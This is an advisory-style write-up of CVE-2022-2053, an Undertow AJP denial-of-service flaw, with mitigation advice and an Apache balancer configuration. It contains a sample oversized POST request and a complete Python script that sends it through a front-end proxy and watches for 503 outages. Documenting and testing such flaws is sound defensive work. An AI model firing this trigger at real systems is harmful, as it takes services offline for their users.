A vulnerability (CVE-2022-2053) has been discovered in Undertow's AjpServerRequestConduit implementation that can lead to denial of service (DoS). It is triggered when a POST request received over AJP (Apache JServ Protocol) carries a body larger than the configured maxEntitySize limit. In that situation Undertow closes the AJP connection without sending any response to the client/proxy, so front-end proxies such as mod_cluster and mod_proxy_balancer mark the backend worker as being in error state.

Exploit Details

An attacker can trigger this by sending a POST request whose body exceeds the maxEntitySize limit through the front-end proxy, which forwards it to the backend over AJP. The body content is irrelevant; only its size matters. Because the backend closes the connection without responding, the proxy marks that backend worker as in error state and stops forwarding requests to it for a certain period of time.

For example, in mod_cluster the worker stays in error state until the next STATUS request (sent at 10-second intervals) from the application server updates the server state. In the worst case this results in "All workers are in error state" and mod_cluster responding "503 Service Unavailable" for up to 10 seconds. In mod_proxy_balancer, the worker stays in error state until the "retry" timeout passes (60 seconds by default).

Below is an example of a POST request that exceeds the maxEntitySize limit. The declared Content-Length must be larger than the limit configured on the Undertow AJP listener; the 1 MiB shown here assumes a limit below that, since Undertow's default (UndertowOptions.MAX_ENTITY_SIZE, exposed as max-post-size on the WildFly ajp-listener) is 10 MiB.

POST /vulnerable_endpoint HTTP/1.1
Host: target_server
Content-Length: 1048576
Content-Type: application/x-www-form-urlencoded

# The payload below is a very large string that will exceed the maxEntitySize limit
payload=...
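The raw request above only sketches the body. The script that follows is an example added here; it is not part of the original advisory or the Undertow project. It builds a POST whose body really is the declared size, sends it through the front-end proxy, and then polls a GET for a few seconds so the length of any run of 503 responses can be compared with the proxy's recovery interval. PROXY_HOST, PROXY_PORT, PATH and BODY_SIZE are placeholders; the only assumption about the target is that the proxy forwards PATH to an Undertow AJP listener whose maxEntitySize is smaller than BODY_SIZE.

```python
"""CVE-2022-2053 trigger and observation script (added example).

Not code from the original advisory or the Undertow project. Assumes a
front-end proxy on PROXY_HOST:PROXY_PORT that forwards PATH over AJP to an
Undertow backend whose maxEntitySize is smaller than BODY_SIZE. All of
these values are placeholders.
"""
import socket
import time

PROXY_HOST = "proxy.example"      # placeholder
PROXY_PORT = 80                   # placeholder
PATH = "/vulnerable_endpoint"     # placeholder, as in the request above
# Must exceed the backend's configured limit. Undertow's default
# (UndertowOptions.MAX_ENTITY_SIZE) is 10 MiB, so 16 MiB exceeds it.
BODY_SIZE = 16 * 1024 * 1024


def build_oversized_post(host: str, path: str, body_size: int) -> bytes:
    """Build a raw HTTP/1.1 POST whose body really is body_size bytes.

    Content-Length matches the body, so the proxy forwards the full entity
    over AJP and the backend hits maxEntitySize part-way through reading it.
    The body content is irrelevant; only its size matters.
    """
    prefix = b"payload="
    body = prefix + b"A" * max(0, body_size - len(prefix))
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")
    return head + body


def parse_status(response: bytes) -> int:
    """Return the status code of a raw HTTP response, or 0 when no status
    line came back (e.g. the connection was closed without a response)."""
    line = response.split(b"\r\n", 1)[0]
    parts = line.split(b" ")
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return 0
    try:
        return int(parts[1])
    except ValueError:
        return 0


def send_raw(host: str, port: int, request: bytes, timeout: float = 10.0) -> bytes:
    """Send request bytes and return whatever the peer sends back."""
    chunks = []
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
    except (ConnectionResetError, BrokenPipeError, socket.timeout):
        # A reset while uploading is expected: the backend dropped the
        # AJP connection and the proxy tore ours down in turn.
        pass
    return b"".join(chunks)


def probe_get(host: str, port: int, path: str) -> int:
    """One GET through the proxy; 503 means it has no usable worker."""
    req = f"GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    return parse_status(send_raw(host, port, req.encode("ascii")))


def observe(host: str, port: int, path: str, seconds: int = 15) -> list:
    """Poll once per second and return the status codes seen, so a run of
    503s can be compared with the proxy's recovery interval (10 s STATUS
    for mod_cluster, the retry timeout for mod_proxy_balancer)."""
    seen = []
    deadline = time.monotonic() + seconds
    while time.monotonic() < deadline:
        seen.append(probe_get(host, port, path))
        time.sleep(1)
    return seen


if __name__ == "__main__":
    print("before:", probe_get(PROXY_HOST, PROXY_PORT, PATH))
    trigger = build_oversized_post(PROXY_HOST, PATH, BODY_SIZE)
    print("trigger:", parse_status(send_raw(PROXY_HOST, PROXY_PORT, trigger)))
    print("after:", observe(PROXY_HOST, PROXY_PORT, PATH))
```

On a vulnerable setup the "trigger" line typically reports 0 or a proxy error, and "after" shows a run of 503s whose length matches the proxy's recovery window; on a fixed Undertow the backend answers the oversized POST itself and the GET probes keep returning the application's normal status. Run this only against systems you are authorised to test.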

Mitigation

This vulnerability has been fixed in Undertow 2.2.19.Final and Undertow 2.3.0.Alpha2. Updating to one of these versions, or a later release, is the recommended fix; the proxy-side setting below only limits the impact.

For those using mod_proxy_balancer, the "forcerecovery" balancer parameter (On by default) mitigates the impact: when all workers are in error state it forces immediate recovery of all of them without waiting for the "retry" timeout, so clients do not receive "503 Service Unavailable". It does not stop an individual worker from being marked in error state and sitting idle until "retry" expires while other workers take the traffic, and it is specific to mod_proxy_balancer.
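A mod_proxy_balancer fragment showing the two parameters involved, added here as an example (not configuration from the original advisory or the Undertow project). Host names, ports, the balancer name and the path are placeholders.

```apache
# Two Undertow AJP listeners behind one balancer (placeholders).
<Proxy "balancer://undertow">
    # retry is the per-worker error-state timeout; 60 seconds is the default.
    BalancerMember "ajp://app1.internal:8009" retry=60
    BalancerMember "ajp://app2.internal:8009" retry=60
    # forcerecovery is On by default; it is written out so the setting
    # survives copy-paste. With forcerecovery=Off, oversized POSTs that put
    # both members in error state leave clients with 503s for the full
    # retry window.
    ProxySet forcerecovery=On
</Proxy>

ProxyPass        "/app" "balancer://undertow/app"
ProxyPassReverse "/app" "balancer://undertow/app"
```

After a change, confirm the live values with the balancer-manager handler if it is enabled, or by watching for "All workers are in error state" in the error log while running the trigger request.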

References

- Undertow GitHub Repository
- AjpServerRequestConduit Source Code
- Undertow 2.2.19.Final Release Notes
- Undertow 2.3.0.Alpha2 Release Notes

Conclusion

The Undertow AjpServerRequestConduit vulnerability (CVE-2022-2053) can lead to denial of service (DoS) if not mitigated. Updating to Undertow 2.2.19.Final or 2.3.0.Alpha2 (or later) fixes it; keeping the "forcerecovery" setting enabled in mod_proxy_balancer limits the impact until the upgrade is done.

Timeline

Published on: 08/05/2022 16:15:00 UTC
Last modified on: 08/11/2022 14:06:00 UTC